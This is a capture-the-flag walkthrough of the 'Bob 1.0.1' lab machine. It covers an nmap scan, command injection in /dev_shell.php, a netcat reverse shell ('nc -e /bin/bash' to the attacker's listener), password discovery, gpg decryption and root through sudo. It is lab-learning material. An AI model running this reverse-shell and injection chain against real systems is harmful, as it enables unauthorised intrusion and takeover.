Bob 1.0.1

Bob 1.0.1

Enumeration

nmap

nmap -sC -sV -oA nmap/Bob 192.168.1.112

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 22:59 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.112
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:3B:96:26 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds

We see that there is only port 80 open and some disallow entries

Let's put it at the browser see what we got

Got this.

Exploitation

Then I navigate to /dev_shell.php

Got this shell, tried ping 192.168.1.113 and ; ping 102.168.1.113 and got this error

After a few tries, found out id can be used, so I went to try to set up a listener

Reverse Shell

At our machine, type

nc -nlvp 4444

At the dev_shell, type

id | nc -e /bin/bash 192.168.1.113 4444

Then we will receive a shell, from there, type

python -c 'import pty; pty.spawn("/bin/bash")'

Then navigate to the /home directory and we will see 4 directory bob, elliot, jc and seb

I first went to the elliot directory and saw a file called theadminisdumb.txt

After cat the file

We can see that there is a password Qwerty for a user, after su to other 3 users, we know that the user is for jc. The password theadminisdumb is for elliot.

su into elliot

I can't find anything on those users, so I went to bob user to find any interesting, after looking around I navigate to /Documents and saw 2 text files and a directory

Going inside the /Secret/Keep_out/Not_Porn/No_Lookie_In_Here, there is a notes.sh

Cat the file, after that the first character of each sentence is HARPOCRATES, it must be indicates a password

I went back tot he Document directory

We can see there is a login.txt.gpg, use the string we got just now we might decrypt the file.

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

We can see that a credentials has been decrypted! and it is bob credentials

Privilege Escalation

Lets su into bob

type sudo -l

We can see it has sudo rights for this user

type sudo bash and we will get root

type /flag.txt and we will get the flag

Congratulation!